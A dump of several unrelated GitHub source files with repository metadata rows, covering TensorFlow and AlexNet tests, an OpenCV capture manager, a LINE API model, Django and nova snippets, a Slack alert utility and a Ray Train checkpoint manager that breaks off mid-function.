example.features.feature['image/width'].int64_list.value, [600])
self.assertAllEqual(
example.features.feature['image/source_id'].bytes_list.value,
[b'image_id'])
self.assertTrue(
example.features.feature['image/encoded'].bytes_list.value)
def test_generate_embedding_data_fn(self):
saved_model_path = self._export_saved_model()
top_k_embedding_count = 1
bottom_k_embedding_count = 0
inference_fn = generate_embedding_data.GenerateEmbeddingDataFn(
saved_model_path, top_k_embedding_count, bottom_k_embedding_count)
inference_fn.setup()
generated_example = self._create_tf_example()
self.assertAllEqual(tf.train.Example.FromString(
generated_example).features.feature['image/object/class/label']
.int64_list.value, [5])
self.assertAllEqual(tf.train.Example.FromString(
generated_example).features.feature['image/object/class/text']
.bytes_list.value, [b'hyena'])
output = inference_fn.process(('dummy_key', generated_example))
output_example = output[0][1]
self.assert_expected_example(output_example)
def test_generate_embedding_data_with_top_k_boxes(self):
saved_model_path = self._export_saved_model()
top_k_embedding_count = 2
bottom_k_embedding_count = 0
inference_fn = generate_embedding_data.GenerateEmbeddingDataFn(
saved_model_path, top_k_embedding_count, bottom_k_embedding_count)
inference_fn.setup()
generated_example = self._create_tf_example()
self.assertAllEqual(
tf.train.Example.FromString(generated_example).features
.feature['image/object/class/label'].int64_list.value, [5])
self.assertAllEqual(
tf.train.Example.FromString(generated_example).features
.feature['image/object/class/text'].bytes_list.value, [b'hyena'])
output = inference_fn.process(('dummy_key', generated_example))
output_example = output[0][1]
self.assert_expected_example(output_example, topk=True)
def test_generate_embedding_data_with_bottom_k_boxes(self):
saved_model_path = self._export_saved_model()
top_k_embedding_count = 0
bottom_k_embedding_count = 2
inference_fn = generate_embedding_data.GenerateEmbeddingDataFn(
saved_model_path, top_k_embedding_count, bottom_k_embedding_count)
inference_fn.setup()
generated_example = self._create_tf_example()
self.assertAllEqual(
tf.train.Example.FromString(generated_example).features
.feature['image/object/class/label'].int64_list.value, [5])
self.assertAllEqual(
tf.train.Example.FromString(generated_example).features
.feature['image/object/class/text'].bytes_list.value, [b'hyena'])
output = inference_fn.process(('dummy_key', generated_example))
output_example = output[0][1]
self.assert_expected_example(output_example, botk=True)
def test_beam_pipeline(self):
with InMemoryTFRecord([self._create_tf_example()]) as input_tfrecord:
temp_dir = tempfile.mkdtemp(dir=os.environ.get('TEST_TMPDIR'))
output_tfrecord = os.path.join(temp_dir, 'output_tfrecord')
saved_model_path = self._export_saved_model()
top_k_embedding_count = 1
bottom_k_embedding_count = 0
num_shards = 1
embedding_type = 'final_box_features'
pipeline_options = beam.options.pipeline_options.PipelineOptions(
runner='DirectRunner')
p = beam.Pipeline(options=pipeline_options)
generate_embedding_data.construct_pipeline(
p, input_tfrecord, output_tfrecord, saved_model_path,
top_k_embedding_count, bottom_k_embedding_count, num_shards,
embedding_type)
p.run()
filenames = tf.io.gfile.glob(
output_tfrecord + '-?????-of-?????')
actual_output = []
record_iterator = tf.data.TFRecordDataset(
tf.convert_to_tensor(filenames)).as_numpy_iterator()
for record in record_iterator:
actual_output.append(record)
self.assertEqual(len(actual_output), 1)
self.assert_expected_example(tf.train.Example.FromString(
actual_output[0]))
if __name__ == '__main__':
tf.test.main()
| [
"[email protected]"
] | |
b548b9f7cdadb399f27f06b74930780a08061e79 | 05d5945350fe64f6c1235d4f12ee22323167ca0c | /snakemake/configs/mm10_SRP044873.py | d77054f2e20301267d8ba829038dad7ea369643b | [
"BSD-2-Clause"
] | permissive | saketkc/re-ribo-smk | 674d4423830bbae3a32f46146ffd362514047a60 | c9326cbafdfa060e22e9af692d9146c37f5035ba | refs/heads/master | 2021-07-12T18:46:37.772947 | 2020-05-30T01:41:13 | 2020-05-30T01:41:13 | 148,952,525 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,542 | py | RAWDATA_DIR = '/staging/as/skchoudh/re-ribo-datasets/mm10/SRP044873'
OUT_DIR = '/staging/as/skchoudh/re-ribo-analysis/mm10/SRP044873'
GENOME_FASTA = '/home/cmb-06/as/skchoudh/genomes/mm10/fasta/Mus_musculus.GRCm38.dna.primary_assembly.fa'
CHROM_SIZES = '/home/cmb-06/as/skchoudh/genomes/mm10/fasta/Mus_musculus.GRCm38.dna.primary_assembly.sizes'
STAR_INDEX = '/home/cmb-06/as/skchoudh/genomes/mm10/star_annotated_ribopod'
GTF_VERSION = 'v96'
GTF = '/home/cmb-06/as/skchoudh/genomes/mm10/annotation/Mus_musculus.GRCm38.96.chr_patch_hapl_scaff.gtf'
GENE_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/gene.bed.gz'
STAR_CODON_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/start_codon.bed.gz'
STOP_CODON_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/stop_codon.bed.gz'
CDS_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/cds.bed.gz'
UTR5_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/utr5.bed.gz'
UTR3_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/utr3.bed.gz'
INTRON_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/intron.bed.gz'
ORIENTATIONS = ['5prime', '3prime']
STRANDS = ['pos', 'neg', 'combined']
FRAGMENT_LENGTHS = range(18, 39)
RIBOTRICER_ANNOTATION_PREFIX = '/home/cmb-06/as/skchoudh/genomes/mm10/ribotricer_v96_annotation_longest'
| [
"[email protected]"
] | |
e73bd41c33e69aa417fab4dffaa549a7814efb51 | 9a73c54526082c27e5c5d88bd54950a589233658 | /DeepLearning/Verification_code_identification/nets/alexnet_test.py | f0dc38b9c9f6f80166eb10b496695e7ac63d676d | [
"Apache-2.0"
] | permissive | archu2020/python-2 | af78b65ed7f3ad17f71d4f8a97c002df86908298 | 19c626ca9fd37168db8a7ac075fd80c8e2971313 | refs/heads/master | 2022-12-27T12:08:44.316760 | 2020-10-02T15:46:27 | 2020-10-02T15:46:27 | 300,660,839 | 0 | 0 | Apache-2.0 | 2020-10-02T15:46:28 | 2020-10-02T15:37:58 | Python | UTF-8 | Python | false | false | 5,964 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for slim.nets.alexnet."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from nets import alexnet
slim = tf.contrib.slim
class AlexnetV2Test(tf.test.TestCase):
def testBuild(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(inputs, num_classes)
self.assertEquals(logits.op.name, 'alexnet_v2/fc8/squeezed')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
def testFullyConvolutional(self):
batch_size = 1
height, width = 300, 400
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(inputs, num_classes, spatial_squeeze=False)
self.assertEquals(logits.op.name, 'alexnet_v2/fc8/BiasAdd')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, 4, 7, num_classes])
def testEndPoints(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
_, end_points = alexnet.alexnet_v2(inputs, num_classes)
expected_names = ['alexnet_v2/conv1',
'alexnet_v2/pool1',
'alexnet_v2/conv2',
'alexnet_v2/pool2',
'alexnet_v2/conv3',
'alexnet_v2/conv4',
'alexnet_v2/conv5',
'alexnet_v2/pool5',
'alexnet_v2/fc6',
'alexnet_v2/fc7',
'alexnet_v2/fc8'
]
self.assertSetEqual(set(end_points.keys()), set(expected_names))
def testModelVariables(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
alexnet.alexnet_v2(inputs, num_classes)
expected_names = ['alexnet_v2/conv1/weights',
'alexnet_v2/conv1/biases',
'alexnet_v2/conv2/weights',
'alexnet_v2/conv2/biases',
'alexnet_v2/conv3/weights',
'alexnet_v2/conv3/biases',
'alexnet_v2/conv4/weights',
'alexnet_v2/conv4/biases',
'alexnet_v2/conv5/weights',
'alexnet_v2/conv5/biases',
'alexnet_v2/fc6/weights',
'alexnet_v2/fc6/biases',
'alexnet_v2/fc7/weights',
'alexnet_v2/fc7/biases',
'alexnet_v2/fc8/weights',
'alexnet_v2/fc8/biases',
]
model_variables = [v.op.name for v in slim.get_model_variables()]
self.assertSetEqual(set(model_variables), set(expected_names))
def testEvaluation(self):
batch_size = 2
height, width = 224, 224
num_classes = 1000
with self.test_session():
eval_inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(eval_inputs, is_training=False)
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
predictions = tf.argmax(logits, 1)
self.assertListEqual(predictions.get_shape().as_list(), [batch_size])
def testTrainEvalWithReuse(self):
train_batch_size = 2
eval_batch_size = 1
train_height, train_width = 224, 224
eval_height, eval_width = 300, 400
num_classes = 1000
with self.test_session():
train_inputs = tf.random_uniform(
(train_batch_size, train_height, train_width, 3))
logits, _ = alexnet.alexnet_v2(train_inputs)
self.assertListEqual(logits.get_shape().as_list(),
[train_batch_size, num_classes])
tf.get_variable_scope().reuse_variables()
eval_inputs = tf.random_uniform(
(eval_batch_size, eval_height, eval_width, 3))
logits, _ = alexnet.alexnet_v2(eval_inputs, is_training=False,
spatial_squeeze=False)
self.assertListEqual(logits.get_shape().as_list(),
[eval_batch_size, 4, 7, num_classes])
logits = tf.reduce_mean(logits, [1, 2])
predictions = tf.argmax(logits, 1)
self.assertEquals(predictions.get_shape().as_list(), [eval_batch_size])
def testForward(self):
batch_size = 1
height, width = 224, 224
with self.test_session() as sess:
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(inputs)
sess.run(tf.global_variables_initializer())
output = sess.run(logits)
self.assertTrue(output.any())
if __name__ == '__main__':
tf.test.main()
| [
"[email protected]"
] | |
d72ecdd7a3b850a399fcd9116f3c384b38b3d1d6 | 181e9cc9cf4e52fcc6e9979890cc5b41e7beb756 | /Module 1/06_Codes/06/06_Codes/managers.py | c2650fc77fbc09ebd2367a198a7481ec81ec29c4 | [
"MIT"
] | permissive | PacktPublishing/OpenCV-Computer-Vision-Projects-with-Python | ace8576dce8d5f5db6992b3e5880a717996f78cc | 45a9c695e5bb29fa3354487e52f29a565d700d5c | refs/heads/master | 2023-02-09T14:10:42.767047 | 2023-01-30T09:02:09 | 2023-01-30T09:02:09 | 71,112,659 | 96 | 72 | null | null | null | null | UTF-8 | Python | false | false | 6,862 | py | import cv2
import numpy
import pygame
import time
import utils
class CaptureManager(object):
def __init__(self, capture, previewWindowManager = None,
shouldMirrorPreview = False):
self.previewWindowManager = previewWindowManager
self.shouldMirrorPreview = shouldMirrorPreview
self._capture = capture
self._channel = 0
self._enteredFrame = False
self._frame = None
self._imageFilename = None
self._videoFilename = None
self._videoEncoding = None
self._videoWriter = None
self._startTime = None
self._framesElapsed = long(0)
self._fpsEstimate = None
@property
def channel(self):
return self._channel
@channel.setter
def channel(self, value):
if self._channel != value:
self._channel = value
self._frame = None
@property
def frame(self):
if self._enteredFrame and self._frame is None:
_, self._frame = self._capture.retrieve(channel = self.channel)
return self._frame
@property
def isWritingImage(self):
return self._imageFilename is not None
@property
def isWritingVideo(self):
return self._videoFilename is not None
def enterFrame(self):
"""Capture the next frame, if any."""
# But first, check that any previous frame was exited.
assert not self._enteredFrame, \
'previous enterFrame() had no matching exitFrame()'
if self._capture is not None:
self._enteredFrame = self._capture.grab()
def exitFrame(self):
"""Draw to the window. Write to files. Release the frame."""
# Check whether any grabbed frame is retrievable.
# The getter may retrieve and cache the frame.
if self.frame is None:
self._enteredFrame = False
return
# Update the FPS estimate and related variables.
if self._framesElapsed == 0:
self._startTime = time.time()
else:
timeElapsed = time.time() - self._startTime
self._fpsEstimate = self._framesElapsed / timeElapsed
self._framesElapsed += 1
# Draw to the window, if any.
if self.previewWindowManager is not None:
if self.shouldMirrorPreview:
mirroredFrame = numpy.fliplr(self._frame).copy()
self.previewWindowManager.show(mirroredFrame)
else:
self.previewWindowManager.show(self._frame)
# Write to the image file, if any.
if self.isWritingImage:
cv2.imwrite(self._imageFilename, self._frame)
self._imageFilename = None
# Write to the video file, if any.
self._writeVideoFrame()
# Release the frame.
self._frame = None
self._enteredFrame = False
def writeImage(self, filename):
"""Write the next exited frame to an image file."""
self._imageFilename = filename
def startWritingVideo(
self, filename,
encoding = cv2.cv.CV_FOURCC('I','4','2','0')):
"""Start writing exited frames to a video file."""
self._videoFilename = filename
self._videoEncoding = encoding
def stopWritingVideo(self):
"""Stop writing exited frames to a video file."""
self._videoFilename = None
self._videoEncoding = None
self._videoWriter = None
def _writeVideoFrame(self):
if not self.isWritingVideo:
return
if self._videoWriter is None:
fps = self._capture.get(cv2.cv.CV_CAP_PROP_FPS)
if fps == 0.0:
# The capture's FPS is unknown so use an estimate.
if self._framesElapsed < 20:
# Wait until more frames elapse so that the
# estimate is more stable.
return
else:
fps = self._fpsEstimate
size = (int(self._capture.get(
cv2.cv.CV_CAP_PROP_FRAME_WIDTH)),
int(self._capture.get(
cv2.cv.CV_CAP_PROP_FRAME_HEIGHT)))
self._videoWriter = cv2.VideoWriter(
self._videoFilename, self._videoEncoding,
fps, size)
self._videoWriter.write(self._frame)
class WindowManager(object):
def __init__(self, windowName, keypressCallback = None):
self.keypressCallback = keypressCallback
self._windowName = windowName
self._isWindowCreated = False
@property
def isWindowCreated(self):
return self._isWindowCreated
def createWindow(self):
cv2.namedWindow(self._windowName)
self._isWindowCreated = True
def show(self, frame):
cv2.imshow(self._windowName, frame)
def destroyWindow(self):
cv2.destroyWindow(self._windowName)
self._isWindowCreated = False
def processEvents(self):
keycode = cv2.waitKey(1)
if self.keypressCallback is not None and keycode != -1:
# Discard any non-ASCII info encoded by GTK.
keycode &= 0xFF
self.keypressCallback(keycode)
class PygameWindowManager(WindowManager):
def createWindow(self):
pygame.display.init()
pygame.display.set_caption(self._windowName)
self._isWindowCreated = True
def show(self, frame):
# Find the frame's dimensions in (w, h) format.
frameSize = frame.shape[1::-1]
# Convert the frame to RGB, which Pygame requires.
if utils.isGray(frame):
conversionType = cv2.COLOR_GRAY2RGB
else:
conversionType = cv2.COLOR_BGR2RGB
rgbFrame = cv2.cvtColor(frame, conversionType)
# Convert the frame to Pygame's Surface type.
pygameFrame = pygame.image.frombuffer(
rgbFrame.tostring(), frameSize, 'RGB')
# Resize the window to match the frame.
displaySurface = pygame.display.set_mode(frameSize)
# Blit and display the frame.
displaySurface.blit(pygameFrame, (0, 0))
pygame.display.flip()
def destroyWindow(self):
pygame.display.quit()
self._isWindowCreated = False
def processEvents(self):
for event in pygame.event.get():
if event.type == pygame.KEYDOWN and \
self.keypressCallback is not None:
self.keypressCallback(event.key)
elif event.type == pygame.QUIT:
self.destroyWindow()
return | [
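# --- Hedged usage sketch (added for illustration; not part of the original
# module). A minimal capture loop wired from the classes above, assuming a
# webcam at device 0 and the legacy OpenCV 2.x / Python 2 APIs this module
# targets.
if __name__ == '__main__':
    windowManager = PygameWindowManager('Preview')
    captureManager = CaptureManager(cv2.VideoCapture(0), windowManager, True)
    windowManager.createWindow()
    while windowManager.isWindowCreated:
        captureManager.enterFrame()
        captureManager.exitFrame()  # draws the frame, honors pending writes, releases it
        windowManager.processEvents()  # a Pygame QUIT event destroys the window, ending the loop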
"[email protected]"
] | |
549d26bdfebb26f7e41ffa553e48b04e054ae011 | 5e255ad1360c90478393744586663741a9569c21 | /linebot/v3/insight/models/get_statistics_per_unit_response_overview.py | 8dead06a2e9bdba632aa7f0ff33642dfff6804fd | [
"Apache-2.0"
] | permissive | line/line-bot-sdk-python | d76268e8b542060d6eccbacc5dbfab16960ecc35 | cffd35948238ae24982173e30b1ea1e595bbefd9 | refs/heads/master | 2023-08-31T22:12:31.698183 | 2023-08-28T01:10:09 | 2023-08-28T01:10:09 | 70,553,423 | 1,898 | 1,181 | Apache-2.0 | 2023-09-11T05:14:07 | 2016-10-11T03:42:26 | Python | UTF-8 | Python | false | false | 4,122 | py | # coding: utf-8
"""
LINE Messaging API(Insight)
This document describes LINE Messaging API(Insight). # noqa: E501
The version of the OpenAPI document: 0.0.1
Generated by OpenAPI Generator (https://openapi-generator.tech)
Do not edit the class manually.
"""
from __future__ import annotations
import pprint
import re # noqa: F401
import json
from typing import Optional
from pydantic.v1 import BaseModel, Field, StrictInt
class GetStatisticsPerUnitResponseOverview(BaseModel):
"""
Statistics related to messages.
https://developers.line.biz/en/reference/messaging-api/#get-statistics-per-unit-response
"""
unique_impression: Optional[StrictInt] = Field(None, alias="uniqueImpression", description="Number of users who opened the message, meaning they displayed at least 1 bubble.")
unique_click: Optional[StrictInt] = Field(None, alias="uniqueClick", description="Number of users who opened any URL in the message.")
unique_media_played: Optional[StrictInt] = Field(None, alias="uniqueMediaPlayed", description="Number of users who started playing any video or audio in the message.")
unique_media_played100_percent: Optional[StrictInt] = Field(None, alias="uniqueMediaPlayed100Percent", description="Number of users who played the entirety of any video or audio in the message.")
__properties = ["uniqueImpression", "uniqueClick", "uniqueMediaPlayed", "uniqueMediaPlayed100Percent"]
class Config:
"""Pydantic configuration"""
allow_population_by_field_name = True
validate_assignment = True
def to_str(self) -> str:
"""Returns the string representation of the model using alias"""
return pprint.pformat(self.dict(by_alias=True))
def to_json(self) -> str:
"""Returns the JSON representation of the model using alias"""
return json.dumps(self.to_dict())
@classmethod
def from_json(cls, json_str: str) -> GetStatisticsPerUnitResponseOverview:
"""Create an instance of GetStatisticsPerUnitResponseOverview from a JSON string"""
return cls.from_dict(json.loads(json_str))
def to_dict(self):
"""Returns the dictionary representation of the model using alias"""
_dict = self.dict(by_alias=True,
exclude={
},
exclude_none=True)
# set to None if unique_impression (nullable) is None
# and __fields_set__ contains the field
if self.unique_impression is None and "unique_impression" in self.__fields_set__:
_dict['uniqueImpression'] = None
# set to None if unique_click (nullable) is None
# and __fields_set__ contains the field
if self.unique_click is None and "unique_click" in self.__fields_set__:
_dict['uniqueClick'] = None
# set to None if unique_media_played (nullable) is None
# and __fields_set__ contains the field
if self.unique_media_played is None and "unique_media_played" in self.__fields_set__:
_dict['uniqueMediaPlayed'] = None
# set to None if unique_media_played100_percent (nullable) is None
# and __fields_set__ contains the field
if self.unique_media_played100_percent is None and "unique_media_played100_percent" in self.__fields_set__:
_dict['uniqueMediaPlayed100Percent'] = None
return _dict
@classmethod
def from_dict(cls, obj: dict) -> GetStatisticsPerUnitResponseOverview:
"""Create an instance of GetStatisticsPerUnitResponseOverview from a dict"""
if obj is None:
return None
if not isinstance(obj, dict):
return GetStatisticsPerUnitResponseOverview.parse_obj(obj)
_obj = GetStatisticsPerUnitResponseOverview.parse_obj({
"unique_impression": obj.get("uniqueImpression"),
"unique_click": obj.get("uniqueClick"),
"unique_media_played": obj.get("uniqueMediaPlayed"),
"unique_media_played100_percent": obj.get("uniqueMediaPlayed100Percent")
})
return _obj
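# --- Hedged usage sketch (added for illustration; not part of the generated
# file). Round-tripping the camelCase JSON payload through the model:
#   raw = ('{"uniqueImpression": 40, "uniqueClick": 30,'
#          ' "uniqueMediaPlayed": null, "uniqueMediaPlayed100Percent": null}')
#   overview = GetStatisticsPerUnitResponseOverview.from_json(raw)
#   overview.unique_impression  # -> 40, mapped through the field aliases above
#   overview.to_json()          # nulls re-emitted only for fields explicitly set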
| [
"[email protected]"
] | |
97d15d6f45852f8ad8f5576eff06fea5cb1089b3 | 43cbef9a8b7424fb7144255d1d9494be828e3b4c | /nes_randomizer/registration/urls.py | a6c54bd79ab683e6b46d4559d9fdcb440476523a | [] | no_license | thebmo/NESRandomizer | 59135814c3dd23d948af1f5ce7ca236c8f96dc56 | 1bad8c3ba8ed2a513f3ecd7005023f063fc3ba1f | refs/heads/master | 2020-07-05T08:19:02.916233 | 2015-11-03T03:34:32 | 2015-11-03T03:34:32 | 22,393,483 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('',
url(r'^$', views.register, name='register'),
)
| [
"[email protected]"
] | |
46605773042e4694045207282c63666f3ac7d88a | b5550fc728b23cb5890fd58ccc5e1668548dc4e3 | /network/security_group/openstack_driver.py | 9717ba421b4a63ea98d5328cfd53bec9b7f01766 | [] | no_license | bopopescu/nova-24 | 0de13f078cf7a2b845cf01e613aaca2d3ae6104c | 3247a7199932abf9718fb3260db23e9e40013731 | refs/heads/master | 2022-11-20T00:48:53.224075 | 2016-12-22T09:09:57 | 2016-12-22T09:09:57 | 282,140,423 | 0 | 0 | null | 2020-07-24T06:24:14 | 2020-07-24T06:24:13 | null | UTF-8 | Python | false | false | 1,631 | py | #coding:utf-8
# Copyright 2013 Nicira, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
from nova.openstack.common import importutils
security_group_opts = [
cfg.StrOpt('security_group_api',
default='nova',
help='The full class name of the security API class'),
]
CONF = cfg.CONF
CONF.register_opts(security_group_opts)
NOVA_DRIVER = ('nova.api.openstack.compute.contrib.security_groups.'
'NativeNovaSecurityGroupAPI')
NEUTRON_DRIVER = ('nova.api.openstack.compute.contrib.security_groups.'
'NativeNeutronSecurityGroupAPI')
def get_openstack_security_group_driver():
if CONF.security_group_api.lower() == 'nova':
return importutils.import_object(NOVA_DRIVER)
elif CONF.security_group_api.lower() in ('neutron', 'quantum'):
return importutils.import_object(NEUTRON_DRIVER)
else:
return importutils.import_object(CONF.security_group_api)
def is_neutron_security_groups():
return CONF.security_group_api.lower() in ('neutron', 'quantum')
| [
"[email protected]"
] | |
0d8cf3d920dc76f0c4b05c2d553f6846e4799bcb | edc80b253c0ad88a421f7cd341d695e601fde73d | /utils.py | 1194f99c9f18970a5625febf931cca1ec72e84ff | [
"MIT"
] | permissive | prashantramangupta/snet-platform-usage | 62cc4061326e89ca39c1b3105362fc4b4fb9509c | 41b0669ebebf116012f312a333d0b3cbcdcf8519 | refs/heads/master | 2022-11-04T23:57:35.611828 | 2022-10-13T05:03:05 | 2022-10-13T05:03:05 | 177,531,350 | 1 | 1 | MIT | 2022-10-12T10:20:37 | 2019-03-25T06:56:31 | Python | UTF-8 | Python | false | false | 1,607 | py | import json
import datetime
import decimal
import requests
from constant import SLACK_HOOK
IGNORED_LIST = ['row_id', 'row_created', 'row_updated']
class Utils:
def __init__(self):
self.msg_type = {
0 : 'info:: ',
1 : 'err:: '
}
def report_slack(self, type, slack_msg):
url = SLACK_HOOK['hostname'] + SLACK_HOOK['path']
prefix = self.msg_type.get(type, "")
print(url)
payload = {"channel": "#contract-index-alerts",
"username": "webhookbot",
"text": prefix + slack_msg,
"icon_emoji": ":ghost:"
}
resp = requests.post(url=url, data=json.dumps(payload))
print(resp.status_code, resp.text)
def clean(self, value_list):
for value in value_list:
self.clean_row(value)
def clean_row(self, row):
for item in IGNORED_LIST:
del row[item]
for key in row:
if isinstance(row[key], decimal.Decimal) or isinstance(row[key], datetime.datetime):
row[key] = str(row[key])
elif isinstance(row[key], bytes):
if row[key] == b'\x01':
row[key] = 1
elif row[key] == b'\x00':
row[key] = 0
else:
raise Exception("Unsupported bytes object. Key " + str(key) + " value " + str(row[key]))
return row
def remove_http_https_prefix(self, url):
url = url.replace("https://","")
url = url.replace("http://","")
return url | [
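# --- Hedged usage sketch (added for illustration; not part of the original
# module). Assumes SLACK_HOOK in constant.py points at a valid incoming
# webhook:
#   util = Utils()
#   util.report_slack(1, "contract index sync failed")  # posts "err:: contract index sync failed"
#   row = {'row_id': 1, 'row_created': datetime.datetime.now(),
#          'row_updated': datetime.datetime.now(), 'enabled': b'\x01'}
#   util.clean_row(row)  # -> {'enabled': 1}; bookkeeping keys are removed in place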
"[email protected]"
] | |
33673f2e8184b5c2020942244cf7cd80e01a59c1 | ad0e853db635edc578d58891b90f8e45a72a724f | /python/ray/train/_internal/checkpoint.py | 82c25febb8b0d79b04a829842a8758c8d245538a | [
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] | permissive | ericl/ray | 8c93fc713af3b753215d4fe6221278700936e2db | e9a1c6d814fb1a81033809f56695030d651388f5 | refs/heads/master | 2023-08-31T11:53:23.584855 | 2023-06-07T21:04:28 | 2023-06-07T21:04:28 | 91,077,004 | 2 | 4 | Apache-2.0 | 2023-01-11T17:19:10 | 2017-05-12T09:51:04 | Python | UTF-8 | Python | false | false | 11,154 | py | import os
import logging
from pathlib import Path
from typing import Callable, Dict, List, Optional, Type, Union
from ray.air import Checkpoint, CheckpointConfig, session
from ray.air._internal.checkpoint_manager import CheckpointStorage
from ray.air._internal.checkpoint_manager import (
_CheckpointManager as CommonCheckpointManager,
)
from ray.air._internal.checkpoint_manager import _TrackedCheckpoint
from ray.train._internal.session import TrainingResult
from ray.train._internal.utils import construct_path
from ray.train.constants import (
CHECKPOINT_RANK_KEY,
TRAIN_CHECKPOINT_SUBDIR,
TUNE_CHECKPOINT_ID,
TUNE_INSTALLED,
CHECKPOINT_METADATA_KEY,
LAZY_CHECKPOINT_MARKER_FILE,
)
from ray.air.constants import TIMESTAMP
if TUNE_INSTALLED:
from ray import tune
else:
tune = None
logger = logging.getLogger(__name__)
def load_checkpoint_from_path(checkpoint_to_load: Union[str, Path]) -> Checkpoint:
"""Utility function to load a checkpoint from a path."""
checkpoint_path = Path(checkpoint_to_load).expanduser()
if not checkpoint_path.exists():
raise ValueError(f"Checkpoint path {checkpoint_path} does not exist.")
checkpoint = Checkpoint.from_directory(str(checkpoint_path))
return checkpoint
class CheckpointManager(CommonCheckpointManager):
"""Manages checkpoint processing, writing, and loading.
- A ``checkpoints`` directory is created in the ``run_dir`` and contains
all the checkpoint files.
The full default path will be:
~/ray_results/train_<datestring>/run_<run_id>/checkpoints/
checkpoint_<checkpoint_id>
Attributes:
latest_checkpoint_dir: Path to the file directory for
the checkpoints from the latest run. Configured through
``start_training``.
latest_checkpoint_filename: Filename for the latest
checkpoint.
next_checkpoint_path: Path to the next checkpoint to
persist from the latest run.
best_checkpoint_path: Path to the best persisted
checkpoint from the latest run.
latest_checkpoint_id: The id of the most recently
saved checkpoint.
latest_checkpoint: The latest saved checkpoint. This
checkpoint may not be saved to disk.
"""
_persist_memory_checkpoints = True
def __init__(
self,
run_dir: Optional[Path] = None,
checkpoint_strategy: Optional[CheckpointConfig] = None,
):
self.run_dir = run_dir
super().__init__(checkpoint_strategy=checkpoint_strategy)
self._validate_checkpoint_strategy()
def _validate_checkpoint_strategy(self):
if self._checkpoint_strategy.checkpoint_score_attribute is None:
self._checkpoint_strategy.checkpoint_score_attribute = TIMESTAMP
def _load_checkpoint(
self, checkpoint_to_load: Optional[Union[Dict, str, Path, Checkpoint]]
) -> Optional[Checkpoint]:
"""Load the checkpoint dictionary from the input dict or path."""
if checkpoint_to_load is None:
return None
if isinstance(checkpoint_to_load, Dict):
return Checkpoint.from_dict(checkpoint_to_load)
if isinstance(checkpoint_to_load, Checkpoint):
return checkpoint_to_load
else:
# Load checkpoint from path.
return load_checkpoint_from_path(checkpoint_to_load)
def _process_checkpoint(
self,
checkpoint_result: TrainingResult,
decode_checkpoint_fn: Callable,
) -> _TrackedCheckpoint:
checkpoint_data = checkpoint_result.data
checkpoint_metadata = checkpoint_result.metadata or {}
checkpoint_rank = checkpoint_metadata.get(CHECKPOINT_RANK_KEY, 0)
if isinstance(checkpoint_data, str):
checkpoint_class: Type[Checkpoint] = checkpoint_metadata[
CHECKPOINT_METADATA_KEY
].checkpoint_type
checkpoint_data = checkpoint_class.from_directory(checkpoint_data)
checkpoint_data._metadata = checkpoint_metadata[CHECKPOINT_METADATA_KEY]
else:
# TODO(ml-team): Remove once we remove Backend.decode_data
checkpoint_data = decode_checkpoint_fn(checkpoint_data)
score_attr = self._checkpoint_strategy.checkpoint_score_attribute
if (
self._checkpoint_strategy.num_to_keep != 0
and score_attr not in checkpoint_metadata
):
raise ValueError(
f"Unable to persist checkpoint for "
f"checkpoint_score_attribute: "
f"{score_attr}. "
f"Include this attribute in the call to "
f"`session.report()`."
)
return _TrackedCheckpoint(
dir_or_data=checkpoint_data,
checkpoint_id=self._latest_checkpoint_id,
storage_mode=CheckpointStorage.MEMORY,
metrics={score_attr: checkpoint_metadata.get(score_attr, 0.0)},
rank=checkpoint_rank,
)
def _process_checkpoints(
self,
checkpoint_results: List[TrainingResult],
decode_checkpoint_fn: Callable,
) -> None:
"""Ray Train entrypoint. Perform all processing for a checkpoint."""
if self._checkpoint_strategy._checkpoint_keep_all_ranks:
tracked_checkpoints = [
self._process_checkpoint(checkpoint_result, decode_checkpoint_fn)
for checkpoint_result in checkpoint_results
]
else:
# Get checkpoint from first worker.
tracked_checkpoints = [
